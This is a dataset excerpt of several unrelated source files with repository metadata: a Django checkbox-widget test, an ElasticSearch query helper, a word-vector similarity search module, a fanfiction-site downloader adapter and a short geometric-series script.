] | null | null | null | tests/forms_tests/widget_tests/test_checkboxselectmultiple.py | peteralexandercharles/django | 61c7350f41f2534daf3888709f3c987b7d779a29 | [
"BSD-3-Clause",
"0BSD"
] | null | null | null | import datetime
from django import forms
from django.forms import CheckboxSelectMultiple
from django.test import override_settings
from .base import WidgetTest
class CheckboxSelectMultipleTest(WidgetTest):
widget = CheckboxSelectMultiple
def test_render_value(self):
self.check_html(
self.widget(choices=self.beatles),
"beatles",
["J"],
html=(
"""<ul>
<li><label><input checked type="checkbox" name="beatles" value="J"> John</label></li>
<li><label><input type="checkbox" name="beatles" value="P"> Paul</label></li>
<li><label><input type="checkbox" name="beatles" value="G"> George</label></li>
<li><label><input type="checkbox" name="beatles" value="R"> Ringo</label></li>
</ul>"""
),
)
def test_render_value_multiple(self):
self.check_html(
self.widget(choices=self.beatles),
"beatles",
["J", "P"],
html=(
"""<ul>
<li><label><input checked type="checkbox" name="beatles" value="J"> John</label></li>
<li><label><input checked type="checkbox" name="beatles" value="P"> Paul</label></li>
<li><label><input type="checkbox" name="beatles" value="G"> George</label></li>
<li><label><input type="checkbox" name="beatles" value="R"> Ringo</label></li>
</ul>"""
),
)
def test_render_none(self):
"""
If the value is None, none of the options are selected, even if the
choices have an empty option.
"""
self.check_html(
self.widget(choices=(("", "Unknown"),) + self.beatles),
"beatles",
None,
html=(
"""<ul>
<li><label><input type="checkbox" name="beatles" value=""> Unknown</label></li>
<li><label><input type="checkbox" name="beatles" value="J"> John</label></li>
<li><label><input type="checkbox" name="beatles" value="P"> Paul</label></li>
<li><label><input type="checkbox" name="beatles" value="G"> George</label></li>
<li><label><input type="checkbox" name="beatles" value="R"> Ringo</label></li>
</ul>"""
),
)
def test_nested_choices(self):
nested_choices = (
("unknown", "Unknown"),
("Audio", (("vinyl", "Vinyl"), ("cd", "CD"))),
("Video", (("vhs", "VHS"), ("dvd", "DVD"))),
)
html = """
<ul id="media">
<li>
<label for="media_0"><input id="media_0" name="nestchoice" type="checkbox" value="unknown"> Unknown</label>
</li>
<li>Audio<ul id="media_1">
<li>
<label for="media_1_0">
<input checked id="media_1_0" name="nestchoice" type="checkbox" value="vinyl"> Vinyl
</label>
</li>
<li>
<label for="media_1_1"><input id="media_1_1" name="nestchoice" type="checkbox" value="cd"> CD</label>
</li>
</ul></li>
<li>Video<ul id="media_2">
<li>
<label for="media_2_0"><input id="media_2_0" name="nestchoice" type="checkbox" value="vhs"> VHS</label>
</li>
<li>
<label for="media_2_1">
<input checked id="media_2_1" name="nestchoice" type="checkbox" value="dvd"> DVD
</label>
</li>
</ul></li>
</ul>
"""
self.check_html(
self.widget(choices=nested_choices),
"nestchoice",
("vinyl", "dvd"),
attrs={"id": "media"},
html=html,
)
def test_nested_choices_without_id(self):
nested_choices = (
("unknown", "Unknown"),
("Audio", (("vinyl", "Vinyl"), ("cd", "CD"))),
("Video", (("vhs", "VHS"), ("dvd", "DVD"))),
)
html = """
<ul>
<li>
<label><input name="nestchoice" type="checkbox" value="unknown"> Unknown</label>
</li>
<li>Audio<ul>
<li>
<label>
<input checked name="nestchoice" type="checkbox" value="vinyl"> Vinyl
</label>
</li>
<li>
<label><input name="nestchoice" type="checkbox" value="cd"> CD</label>
</li>
</ul></li>
<li>Video<ul>
<li>
<label><input name="nestchoice" type="checkbox" value="vhs"> VHS</label>
</li>
<li>
<label>
<input checked name="nestchoice" type="checkbox" value="dvd"> DVD
</label>
</li>
</ul></li>
</ul>
"""
self.check_html(
self.widget(choices=nested_choices),
"nestchoice",
("vinyl", "dvd"),
html=html,
)
def test_separate_ids(self):
"""
Each input gets a separate ID.
"""
choices = [("a", "A"), ("b", "B"), ("c", "C")]
html = """
<ul id="abc">
<li>
<label for="abc_0"><input checked type="checkbox" name="letters" value="a" id="abc_0"> A</label>
</li>
<li><label for="abc_1"><input type="checkbox" name="letters" value="b" id="abc_1"> B</label></li>
<li>
<label for="abc_2"><input checked type="checkbox" name="letters" value="c" id="abc_2"> C</label>
</li>
</ul>
"""
self.check_html(
self.widget(choices=choices),
"letters",
["a", "c"],
attrs={"id": "abc"},
html=html,
)
def test_separate_ids_constructor(self):
"""
Each input gets a separate ID when the ID is passed to the constructor.
"""
widget = CheckboxSelectMultiple(
attrs={"id": "abc"}, choices=[("a", "A"), ("b", "B"), ("c", "C")]
)
html = """
<ul id="abc">
<li>
<label for="abc_0"><input checked type="checkbox" name="letters" value="a" id="abc_0"> A</label>
</li>
<li><label for="abc_1"><input type="checkbox" name="letters" value="b" id="abc_1"> B</label></li>
<li>
<label for="abc_2"><input checked type="checkbox" name="letters" value="c" id="abc_2"> C</label>
</li>
</ul>
"""
self.check_html(widget, "letters", ["a", "c"], html=html)
@override_settings(USE_L10N=True, USE_THOUSAND_SEPARATOR=True)
def test_doesnt_localize_input_value(self):
choices = [
(1, "One"),
(1000, "One thousand"),
(1000000, "One million"),
]
html = """
<ul>
<li><label><input type="checkbox" name="numbers" value="1"> One</label></li>
<li><label><input type="checkbox" name="numbers" value="1000"> One thousand</label></li>
<li><label><input type="checkbox" name="numbers" value="1000000"> One million</label></li>
</ul>
"""
self.check_html(self.widget(choices=choices), "numbers", None, html=html)
choices = [
(datetime.time(0, 0), "midnight"),
(datetime.time(12, 0), "noon"),
]
html = """
<ul>
<li><label><input type="checkbox" name="times" value="00:00:00"> midnight</label></li>
<li><label><input type="checkbox" name="times" value="12:00:00"> noon</label></li>
</ul>
"""
self.check_html(self.widget(choices=choices), "times", None, html=html)
def test_use_required_attribute(self):
widget = self.widget(choices=self.beatles)
# Always False because browser validation would require all checkboxes
# to be checked instead of at least one.
self.assertIs(widget.use_required_attribute(None), False)
self.assertIs(widget.use_required_attribute([]), False)
self.assertIs(widget.use_required_attribute(["J", "P"]), False)
def test_value_omitted_from_data(self):
widget = self.widget(choices=self.beatles)
self.assertIs(widget.value_omitted_from_data({}, {}, "field"), False)
self.assertIs(
widget.value_omitted_from_data({"field": "value"}, {}, "field"), False
)
def test_label(self):
"""
CheckboxSelectMultiple doesn't contain 'for="field_0"' in the <label>
because clicking that would toggle the first checkbox.
"""
class TestForm(forms.Form):
f = forms.MultipleChoiceField(widget=CheckboxSelectMultiple)
bound_field = TestForm()["f"]
self.assertEqual(bound_field.field.widget.id_for_label("id"), "")
self.assertEqual(bound_field.label_tag(), "<label>F:</label>")
| 35.761317 | 115 | 0.523936 |
426badcb4265d9e2dc3c669461097767254c2c46 | 1,474 | py | Python | elasticsearch.py | MingChen91/monitoring-scripts | acfe4bb74b90eef4112dbde9527db4cce90936be | [
"MIT"
] | null | null | null | elasticsearch.py | MingChen91/monitoring-scripts | acfe4bb74b90eef4112dbde9527db4cce90936be | [
"MIT"
] | null | null | null | elasticsearch.py | MingChen91/monitoring-scripts | acfe4bb74b90eef4112dbde9527db4cce90936be | [
"MIT"
] | null | null | null | import json
import subprocess
from collections import OrderedDict
from urllib import parse
import requests
class ElasticSearch:
def __init__(self, env: str):
"""
Connects to elastic search.
Args:
env (str): environment to connect to, dev, staging, prod
"""
self.__env = env
self.__read_only_key = self.__get_read_only_key()
def query(self, query: str) -> dict:
"""
Sends a string query to elastic search and returns the result
"""
query_string = parse.urlencode(OrderedDict(esQuery=query))
# Elastic search needs IP to be whitelisted, use halter bff service instead so can be used by anyone
url = f"https://halter-core.{self.__env}.halter.io/v1/bff-debug-tool/device-metrics?{query_string}"
payload = {}
headers = {
'Authorization': 'ReadOnly ' + self.__read_only_key
}
response = requests.request("GET", url, headers=headers, data=payload)
response_json = json.loads(response.text)
return response_json
def __get_read_only_key(self) -> str:
output = subprocess.run(
f"aws-vault exec halter-{self.__env} -- aws secretsmanager get-secret-value --secret-id halter/auth/readonly/support",
shell=True, check=True, capture_output=True).stdout
secret = json.loads(output)
read_only_key = secret["SecretString"]
return read_only_key
| 31.361702 | 130 | 0.643148 |
db3d070f287dcdcdf73733ba98058f8d08b8734f | 15,829 | py | Python | idiom/__init__.py | thorwhalen/idiom | 86789d3ec6061dcebc27273a116b914c0a900998 | [
"MIT"
] | 1 | 2022-01-19T13:15:23.000Z | 2022-01-19T13:15:23.000Z | idiom/__init__.py | thorwhalen/idiom | 86789d3ec6061dcebc27273a116b914c0a900998 | [
"MIT"
] | null | null | null | idiom/__init__.py | thorwhalen/idiom | 86789d3ec6061dcebc27273a116b914c0a900998 | [
"MIT"
] | null | null | null | """
Access to wordvec data and useful functions that use it.
"""
from functools import cached_property, partial, lru_cache
import re
from typing import Mapping, Any, Callable, Union, Iterable, Optional
from importlib_resources import files as package_files
from dataclasses import dataclass, field
from itertools import islice
from heapq import nlargest
from typing import Iterable, Callable, Union, Optional
import numpy as np
from sklearn.metrics.pairwise import cosine_distances
from sklearn.neighbors import NearestNeighbors
from sklearn.exceptions import NotFittedError
from py2store import Store
from py2store.slib.s_zipfile import FileStreamsOfZip, FilesOfZip
# from py2store.base import Stream
from creek import Creek
from creek.util import PreIter
data_files = package_files('idiom.data')
english_word2vec_url = (
'https://dl.fbaipublicfiles.com/fasttext/vectors-english/'
'wiki-news-300d-1M-subword.vec.zip'
)
word_frequency_posixpath = data_files.joinpath('english-word-frequency.zip')
def closest_words(
word,
k=10,
search_words: Optional[Union[Callable, Iterable]] = None,
vec_of_word=None,
):
"""Search words related to a give word.
Given a word, search for the `k` closest words to it from a search corpus
(which may just be the wordvec words filtered for specific patterns).
For example, find the closest 10 words to 'mad' that start with an L.
>>> starts_with_L = lambda x: x.startswith('l')
>>> closest_words('mad', k=10, search_words=starts_with_L) # doctest: +SKIP
['lunatic',
'loony',
'loather',
'loathesome',
'love-sick',
'loooove',
'lovestruck',
'lovesick',
'luddite',
'lazy-minded']
Recipe: To avoid errors when giving an explicit list, you may want to filter out
those words that wordvecs doesn't have:
```
search_words = filter(lambda w: w in wordvecs, search_words)
```
"""
vec_of_word = get_vec_of_word(vec_of_word)
target_word_vector = vec_of_word[word]
if search_words is None:
search_words = vec_of_word # everything we have in vec_of_word
elif isinstance(search_words, Callable):
words_filter_func = search_words
search_words = filter(words_filter_func, vec_of_word)
assert isinstance(search_words, Iterable), (
'search_words should None, an iterable or a filter ' 'function'
)
search_word_vectors = map(lambda k: (k, vec_of_word[k]), search_words)
return [
y[0]
for y in nlargest(
k, search_word_vectors, key=lambda x: -cosine(target_word_vector, x[1])
)
]
def word_frequency_streams_of_zip():
return FileStreamsOfZip(str(word_frequency_posixpath))
@lru_cache(maxsize=1)
def most_frequent_words(max_n_words=100_000):
"""The set of most frequent words.
Note: Twice faster than using FilesOfZip and pandas.read_csv
"""
z = word_frequency_streams_of_zip()
with z['unigram_freq.csv'] as zz:
return set([x.decode().split(',')[0] for x in islice(zz, 0, max_n_words)])
def word_frequencies():
"""The set of most frequent words.
Note: Twice faster than using FilesOfZip and pandas.read_csv
"""
z = word_frequency_streams_of_zip()
with z['unigram_freq.csv'] as zz:
next(zz)
for row in zz:
word, freq = row.strip().decode().split(',')
yield word, int(freq)
def get_english_word2vec_zip_filepath():
from graze import Graze
g = Graze()
if english_word2vec_url not in g:
print(
f'Downloading {english_word2vec_url} and storing it locally '
f'(in {g.filepath_of(english_word2vec_url)})'
)
zip_filepath = g.filepath_of(english_word2vec_url)
return zip_filepath
def line_to_raw_word_vec(line, encoding='utf-8', errors='strict'):
word, vec = line.split(maxsplit=1)
return word.decode(encoding, errors), vec
skip_one_item = partial(PreIter().skip_items, n=1)
class WordRawVecCreek(Creek):
pre_iter = staticmethod(skip_one_item)
data_to_obj = staticmethod(line_to_raw_word_vec)
class WordVecCreek(Creek):
def __init__(self, stream, word_filt=None):
super().__init__(stream)
if not callable(word_filt):
word_filt = partial(filter, word_filt)
self.word_filt = word_filt
def pre_iter(self, stream):
next(stream) # consume the first line (it's a header)
return filter(
lambda wv: self.word_filt(wv[0]), map(line_to_raw_word_vec, stream)
) # split word and vec
data_to_obj = staticmethod(lambda wv: (wv[0], np.fromstring(wv[1], sep=' ')))
class WordVecsOfZip(Store.wrap(FileStreamsOfZip)):
_obj_of_data = staticmethod(WordVecCreek)
def english_word2vec_stream(
word_filt=None, zip_filepath=None, key='wiki-news-300d-1M-subword.vec'
):
zip_filepath = zip_filepath or get_english_word2vec_zip_filepath()
lines_of_zip = FileStreamsOfZip(zip_filepath)[key]
return WordVecCreek(lines_of_zip, word_filt)
def word_and_vecs(fp):
# fin = io.open(fname, 'r', encoding='utf-8', newline='\n', errors='ignore')
# consume the first line (n_lines, n_dims) not yielded
# n_lines, n_dims = map(int, fp.readline().decode().split())
for line in fp:
tok, *vec = line.decode().rstrip().split(' ')
yield tok, tuple(map(float, vec))
Vec = np.ndarray
VecStore = Mapping[Any, Vec]
WordVecStore = Mapping[str, Vec]
def mk_tokenizer(tokenizer):
tokenizer_spec = tokenizer
if isinstance(tokenizer_spec, (str, re.Pattern)):
pattern = re.compile(tokenizer_spec)
def tokenizer(string: str):
return pattern.findall(string)
return tokenizer
alpha_num_p = re.compile(r'[\w-]+')
letters_p = re.compile(r'[a-z]+')
#
# def keys_and_vals_of_coll(coll):
# if isinstance(coll, Mapping):
# return zip(*coll.items())
# else:
# return zip(*enumerate(coll))
# class FakeMapping:
# def __init__(self, coll):
# self.coll = coll
#
# def values(self):
# if isinstance(coll, Mapping):
# return coll.items()
# else:
# return enumerate(coll)
#
# def keys(self):
# if isinstance(coll, Mapping):
# return coll.items()
# else:
# return enumerate(coll)
def cosine(x, y):
return cosine_distances([x], [y])[0][0]
@lru_cache(maxsize=1)
def vec_of_word_default_factory():
words = most_frequent_words()
return dict(english_word2vec_stream(word_filt=words.__contains__))
@lru_cache(maxsize=1)
def _get_vec_of_word(corpus):
if isinstance(corpus, str):
if corpus == 'most_frequent_english':
words = most_frequent_words()
return dict(english_word2vec_stream(word_filt=words.__contains__))
elif corpus == 'english_all':
dict(english_word2vec_stream())
raise ValueError(f'Unrecognized corpus value: {corpus}')
DFLT_WORDVEC_CORPUS_NAME = 'most_frequent_english'
word_to_vec_corpus_aliases = {
'most_frequent_english': 'most_frequent_english',
'most_frequent': 'most_frequent_english',
'english_70982': 'most_frequent_english',
'english_all': 'english_all',
'english_999994': 'english_all',
}
def get_vec_of_word(corpus=DFLT_WORDVEC_CORPUS_NAME):
"""Get a word_2_vec dict given an alias name"""
if corpus is None:
corpus = DFLT_WORDVEC_CORPUS_NAME
if isinstance(corpus, str):
if corpus in {'most_frequent_english', 'most_frequent', 'english_70982'}:
_get_vec_of_word('most_frequent_english')
elif corpus in {'english_all', 'english_999994'}:
_get_vec_of_word('most_frequent_english')
raise ValueError(f'Unrecognized corpus value: {corpus}')
@dataclass
class WordVec(Mapping):
"""
Terms:
- query is anything (usually a string) that can be fed to tokenizer to product a list of tokens
- words are tokens that are contained in the vec_of_word Mapping (keys)
- vec is a vector (from the same space as vec_of_word values): Used as a finger print of a query
(through it's tokenization and a formula on the corresponding word's vectors)
Notes:
- If using a non-dict vec_of_word mapping, make sure the __contains__ is efficient, or processing will be slow.
```
w = WordVec(vec_of_word=wv)
assert w.dist('france capital', 'paris') < w.dist('france capital', 'rome')
assert w.dist('italy capital', 'rome') < w.dist('italy capital', 'paris')
```
"""
vec_of_word: WordVecStore = field(
default_factory=vec_of_word_default_factory, repr=False
)
tokenizer = r'[\w-]+'
def __post_init__(self):
self.tokenizer = mk_tokenizer(self.tokenizer)
def dist(self, q1, q2):
"""Cosine distance between two queries (through their corresponding vectors)"""
return cosine(self.query_to_vec(q1), self.query_to_vec(q2))
def query_to_vec(self, query):
"""The vector computed from a query (process is query->tokens->words->vecs->mean).
Note that a query that leads to an empty list of words will result in the mean of all vectors in vec_to_word
"""
words = self.query_2_words(query)
return self.mean_vec(words)
def query_to_vec_matrix(self, query):
words = self.query_2_words(query)
return self.vec_matrix(words)
def mean_vec(self, words):
if len(words) > 0:
vectors = list(filter(lambda v: v is not None, self.vec_matrix(words)))
if len(vectors) > 0:
return np.mean(vectors, axis=0)
return self.global_mean # if all else fails
def query_2_words(self, query):
return [tok for tok in self.tokenizer(query) if tok in self.vec_of_word]
@cached_property
def global_mean(self):
return np.sum(list(self.vec_of_word.values()), axis=0)
# return np.mean(list(self.vec_of_word.values()), axis=0)
def vec_matrix(self, words):
return np.array([self.vec_of_word.get(w, None) for w in words])
def __repr__(self):
tokenizer_name = getattr(self.tokenizer, '__name__', 'unnamed_tokenizer')
return (
f'{self.__class__.__name__}('
f'vec_of_word={type(self.vec_of_word).__name__} with {len(self.vec_of_word)} words, '
f'tokenizer={tokenizer_name})'
)
__call__ = query_to_vec
# TODO: Replace with "explicit" decorator
def __getitem__(self, k):
return self.vec_of_word[k]
def __len__(self):
return len(self.vec_of_word)
def __contains__(self, k):
return k in self.vec_of_word
def __iter__(self):
return iter(self.vec_of_word)
Corpus = Optional[Union[Mapping, Iterable]]
class WordVecSearch:
"""Make a search engine.
Trains on a corpus of vectors (or {word: vector,...} mapping
"""
corpus_ = None
corpus_keys_array_ = None
def __init__(self, word_vec: WordVec = None, n_neighbors=10, **knn_kwargs):
"""
:param word_vec: A WordVec object that will
:param n_neighbors:
:param knn_kwargs:
"""
word_vec = word_vec or WordVec()
self.word_vec = word_vec
knn_kwargs = dict(n_neighbors=n_neighbors, metric='cosine', **knn_kwargs)
self.knn = NearestNeighbors(**knn_kwargs)
def fit(self, corpus: Corpus = None):
"""Fit on the given corpus
:param corpus: A Mapping or iterable whose values we will fit on
- corpus values must be valid self.word_vec arguments (usually strings)
- corpus keys (or indices, if corpus wasn't a Mapping) will be used in results of search
- if not specified, will default to word_vec keys
"""
if corpus is None: # if corpus is not given, use word_vec as the corpus
words = self.word_vec.vec_of_word.keys()
corpus = dict(zip(words, words))
elif not isinstance(corpus, Mapping):
corpus = dict(enumerate(corpus))
self.corpus_ = corpus
vecs = np.array(list(map(self.word_vec, self.corpus_)))
self.knn.fit(vecs)
self.corpus_keys_array_ = np.array(list(self.corpus_.keys()))
return self
def search(self, query, include_dist=False):
try:
query_vec = self.word_vec(query)
r_dist, r_idx = self.knn.kneighbors(query_vec.reshape(1, -1))
corpus_keys = self.corpus_keys_array_[r_idx]
if not include_dist:
return corpus_keys
else:
return corpus_keys, r_dist
except NotFittedError:
self._when_searched_on_unfit_instance()
self.search(query, include_dist)
def _when_searched_on_unfit_instance(self):
from warnings import warn
warn(
"The search object wasn't fitted yet, so I'm fitting it on the "
'wordvec data itself. '
'To avoid this message, do a .fit() before using the search '
'functionality.'
)
return self.fit()
__call__ = search
class StreamsOfZip(FileStreamsOfZip):
def _obj_of_data(self, data):
return line_to_raw_word_vec(data)
class SearchOld:
"""
Example:
```
zip_filepath = '/D/Dropbox/_odata/misc/wiki-news-300d-1M-subword.vec.zip'
import pandas as pd
df = pd.read_excel('/Users/twhalen/Downloads/pypi package names.xlsx')
target_words = set(df.word)
from grub.examples.pypi import Search
s = Search(zip_filepath, search_words=target_words)
s.search('search for the right name')
```
"""
tokenizer = re.compile(r'\w+').findall
def __init__(
self,
wordvec_zip_filepath=None,
search_words=None,
wordvec_name_in_zip='wiki-news-300d-1M-subword.vec',
n_neighbors=37,
verbose=False,
):
self.wordvec_zip_filepath = (
wordvec_zip_filepath or get_english_word2vec_zip_filepath()
)
self.wordvec_name_in_zip = wordvec_name_in_zip
if search_words:
search_words = set(search_words)
self.search_words = search_words
self.n_neighbors = n_neighbors
self.verbose = verbose
@cached_property
def stream(self):
return StreamsOfZip(self.wordvec_zip_filepath)
@cached_property
def wordvecs(self):
if self.verbose:
print('Gathering all the word vecs. This could take a few minutes...')
with self.stream[self.wordvec_name_in_zip] as fp:
all_wordvecs = dict(word_and_vecs(fp))
return all_wordvecs
def filtered_wordvecs(self, tok_filt):
with self.stream[self.wordvec_name_in_zip] as fp:
yield from filter(lambda x: tok_filt(x[0]), word_and_vecs(fp))
def vec_matrix(self, words):
return np.array([self.wordvecs.get(w, None) for w in words])
def mean_vec(self, words):
return np.mean(self.vec_matrix(words), axis=0)
def query_to_vec(self, query):
tokens = self.tokenizer(query)
return self.mean_vec(tokens)
def query_to_vec_matrix(self, query):
tokens = self.tokenizer(query)
return self.vec_matrix(tokens)
@cached_property
def knn(self):
target_wv = dict(self.filtered_wordvecs(lambda x: x in self.search_words))
X = np.array(list(target_wv.values()))
knn = NearestNeighbors(n_neighbors=self.n_neighbors, metric='cosine').fit(X)
knn.words = np.array(list(target_wv.keys()))
return knn
def search(self, query):
query_vec = self.query_to_vec(query)
r_dist, r_idx = self.knn.kneighbors(query_vec.reshape(1, -1))
return self.knn.words[r_idx]
| 30.79572 | 119 | 0.660118 |
736f992e46d46718781517fc7d240e27e520ce3d | 11,134 | py | Python | fanficdownloader/adapters/adapter_onedirectionfanfictioncom.py | rodrigonz/rodrigodeoliveiracosta-clone | 5fb6d2a167e24199f8080ba78392821659575685 | [
"Apache-2.0"
] | null | null | null | fanficdownloader/adapters/adapter_onedirectionfanfictioncom.py | rodrigonz/rodrigodeoliveiracosta-clone | 5fb6d2a167e24199f8080ba78392821659575685 | [
"Apache-2.0"
] | null | null | null | fanficdownloader/adapters/adapter_onedirectionfanfictioncom.py | rodrigonz/rodrigodeoliveiracosta-clone | 5fb6d2a167e24199f8080ba78392821659575685 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright 2012 Fanficdownloader team
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import time
import logging
logger = logging.getLogger(__name__)
import re
import urllib2
from .. import BeautifulSoup as bs
from ..htmlcleanup import stripHTML
from .. import exceptions as exceptions
from base_adapter import BaseSiteAdapter, makeDate
def getClass():
return OneDirectionFanfictionComAdapter
# Class name has to be unique. Our convention is camel case the
# sitename with Adapter at the end. www is skipped.
class OneDirectionFanfictionComAdapter(BaseSiteAdapter):
def __init__(self, config, url):
BaseSiteAdapter.__init__(self, config, url)
self.decode = ["Windows-1252",
"utf8"] # 1252 is a superset of iso-8859-1.
# Most sites that claim to be
# iso-8859-1 (and some that claim to be
# utf8) are really windows-1252.
self.username = "NoneGiven" # if left empty, site doesn't return any message at all.
self.password = ""
self.is_adult=False
# get storyId from url--url validation guarantees query is only sid=1234
self.story.setMetadata('storyId',self.parsedUrl.query.split('=',)[1])
logger.debug("storyId: (%s)"%self.story.getMetadata('storyId'))
# normalized story URL.
self._setURL('http://' + self.getSiteDomain() + '/viewstory.php?sid='+self.story.getMetadata('storyId'))
# Each adapter needs to have a unique site abbreviation.
self.story.setMetadata('siteabbrev','odf')
# The date format will vary from site to site.
# http://docs.python.org/library/datetime.html#strftime-strptime-behavior
self.dateformat = "%m/%d/%y"
@staticmethod # must be @staticmethod, don't remove it.
def getSiteDomain():
# The site domain. Does have www here, if it uses it.
return 'onedirectionfanfiction.com'
@classmethod
def getAcceptDomains(cls):
return ['www.onedirectionfanfiction.com','onedirectionfanfiction.com']
def getSiteExampleURLs(self):
return "http://"+self.getSiteDomain()+"/viewstory.php?sid=1234"
def getSiteURLPattern(self):
return re.escape("http://")+"(www\.)?"+re.escape(self.getSiteDomain()+"/viewstory.php?sid=")+r"\d+$"
## Login seems to be reasonably standard across eFiction sites.
def needToLoginCheck(self, data):
if 'Registered Users Only' in data \
or 'There is no such account on our website' in data \
or "That password doesn't match the one in our database" in data:
return True
else:
return False
def performLogin(self, url):
params = {}
if self.password:
params['penname'] = self.username
params['password'] = self.password
else:
params['penname'] = self.getConfig("username")
params['password'] = self.getConfig("password")
params['cookiecheck'] = '1'
params['submit'] = 'Submit'
loginUrl = 'http://' + self.getSiteDomain() + '/user.php?action=login'
logger.debug("Will now login to URL (%s) as (%s)" % (loginUrl,
params['penname']))
d = self._fetchUrl(loginUrl, params)
if "Member Account" not in d : #Member Account
logger.info("Failed to login to URL %s as %s" % (loginUrl,
params['penname']))
raise exceptions.FailedToLogin(url,params['penname'])
return False
else:
return True
## Getting the chapter list and the meta data, plus 'is adult' checking.
def extractChapterUrlsAndMetadata(self):
if self.is_adult or self.getConfig("is_adult"):
# Weirdly, different sites use different warning numbers.
# If the title search below fails, there's a good chance
# you need a different number. print data at that point
# and see what the 'click here to continue' url says.
addurl = "&ageconsent=ok&warning=4"
else:
addurl=""
# index=1 makes sure we see the story chapter index. Some
# sites skip that for one-chapter stories.
url = self.url+'&index=1'+addurl
logger.debug("URL: "+url)
try:
data = self._fetchUrl(url)
except urllib2.HTTPError, e:
if e.code == 404:
raise exceptions.StoryDoesNotExist(self.url)
else:
raise e
if self.needToLoginCheck(data):
# need to log in for this one.
self.performLogin(url)
data = self._fetchUrl(url)
# The actual text that is used to announce you need to be an
# adult varies from site to site. Again, print data before
# the title search to troubleshoot.
if "Age Consent Required" in data:
raise exceptions.AdultCheckRequired(self.url)
if "Access denied. This story has not been validated by the adminstrators of this site." in data:
raise exceptions.FailedToDownload(self.getSiteDomain() +" says: Access denied. This story has not been validated by the adminstrators of this site.")
# use BeautifulSoup HTML parser to make everything easier to find.
soup = bs.BeautifulSoup(data)
# Now go hunting for all the meta data and the chapter list.
## Title
a = soup.find('a', href=re.compile(r'viewstory.php\?sid='+self.story.getMetadata('storyId')+"$"))
self.story.setMetadata('title',a.string)
# Find authorid and URL from... author url.
a = soup.find('a', href=re.compile(r"viewuser.php\?uid=\d+"))
self.story.setMetadata('authorId',a['href'].split('=')[1])
self.story.setMetadata('authorUrl','http://'+self.host+'/'+a['href'])
self.story.setMetadata('author',a.string)
# Find the chapters:
for chapter in soup.findAll('a', href=re.compile(r'viewstory.php\?sid='+self.story.getMetadata('storyId')+"&chapter=\d+$")):
# just in case there's tags, like <i> in chapter titles.
self.chapterUrls.append((stripHTML(chapter),'http://'+self.host+'/'+chapter['href']+addurl))
self.story.setMetadata('numChapters',len(self.chapterUrls))
# eFiction sites don't help us out a lot with their meta data
# formating, so it's a little ugly.
# utility method
def defaultGetattr(d,k):
try:
return d[k]
except:
return ""
# <span class="label">Rated:</span> NC-17<br /> etc
labels = soup.findAll('span',{'class':'label'})
for labelspan in labels:
value = labelspan.nextSibling
label = labelspan.string
if 'Summary' in label:
## Everything until the next span class='label'
svalue = ""
while not defaultGetattr(value,'class') == 'label':
svalue += str(value)
value = value.nextSibling
self.setDescription(url,svalue)
if 'Rated' in label:
self.story.setMetadata('rating', value)
if 'Word count' in label:
self.story.setMetadata('numWords', value)
if 'Categories' in label:
cats = labelspan.parent.findAll('a',href=re.compile(r'browse.php\?type=categories'))
for cat in cats:
self.story.addToList('category',cat.string)
if 'Characters' in label:
chars = labelspan.parent.findAll('a',href=re.compile(r'browse.php\?type=characters'))
for char in chars:
self.story.addToList('characters',char.string)
if 'Warnings' in label:
warnings = labelspan.parent.findAll('a',href=re.compile(r'browse.php\?type=class&type_id=6'))
for warning in warnings:
self.story.addToList('warnings',warning.string)
if 'Completed' in label:
if 'Yes' in value:
self.story.setMetadata('status', 'Completed')
else:
self.story.setMetadata('status', 'In-Progress')
if 'Published' in label:
self.story.setMetadata('datePublished', makeDate(stripHTML(value), self.dateformat))
if 'Updated' in label:
# there's a stray [ at the end.
#value = value[0:-1]
self.story.setMetadata('dateUpdated', makeDate(stripHTML(value), self.dateformat))
try:
# Find Series name from series URL.
a = soup.find('a', href=re.compile(r"viewseries.php\?seriesid=\d+"))
series_name = a.string
series_url = 'http://'+self.host+'/'+a['href']
# use BeautifulSoup HTML parser to make everything easier to find.
seriessoup = bs.BeautifulSoup(self._fetchUrl(series_url))
storyas = seriessoup.findAll('a', href=re.compile(r'^viewstory.php\?sid=\d+$'))
i=1
for a in storyas:
if a['href'] == ('viewstory.php?sid='+self.story.getMetadata('storyId')):
self.setSeries(series_name, i)
break
i+=1
except:
# I find it hard to care if the series parsing fails
pass
# grab the text for an individual chapter.
def getChapterText(self, url):
logger.debug('Getting chapter text from: %s' % url)
soup = bs.BeautifulStoneSoup(self._fetchUrl(url),
selfClosingTags=('br','hr')) # otherwise soup eats the br/hr tags.
div = soup.find('div', {'id' : 'story'})
if None == div:
raise exceptions.FailedToDownload("Error downloading Chapter: %s! Missing required element!" % url)
return self.utf8FromSoup(url,div)
| 41.544776 | 162 | 0.567451 |
0e8e2f62ad1eee63c82df8f5cbc9a516f2de689f | 369 | py | Python | code/LTI/Basics/sum_series.py | chipmuenk/acoustics | c85ac95a10c09d7fa15d63b2bdb24acab89fec60 | [
"MIT"
] | null | null | null | code/LTI/Basics/sum_series.py | chipmuenk/acoustics | c85ac95a10c09d7fa15d63b2bdb24acab89fec60 | [
"MIT"
] | null | null | null | code/LTI/Basics/sum_series.py | chipmuenk/acoustics | c85ac95a10c09d7fa15d63b2bdb24acab89fec60 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Berechne endliche geometrische Reihe für a = 0.5 und N = 10
Drucke Ergebnisse mit Formatierung
Author: Christian Muenker
"""
summe = 0
for i in range(0,10):
summe += 0.5**i
# alte Syntax
print('i = %2d, Teilsumme: %f' %(i, summe))
# Python 3 Syntax
print('i = {0:2d}, Teilsumme: {1:f}'.format(i, summe))
print(summe) | 20.5 | 59 | 0.609756 |
daffd2440350b91ff68f9650e8e347e5fb4a70d4 | 885 | py | Python | app/analyzers/informants/sma.py | ferreiramarcelo/telegram-crypto-signals | 321d9305de5b98cc1c70bec293cafd0ce7432db3 | [
"MIT"
] | 1,857 | 2020-09-03T16:15:27.000Z | 2022-03-31T23:08:43.000Z | app/analyzers/informants/sma.py | ExBotTrader/Crypto-Signal | 7c6871baa5023e0e4cc14f4cd5ae10ac5592698d | [
"MIT"
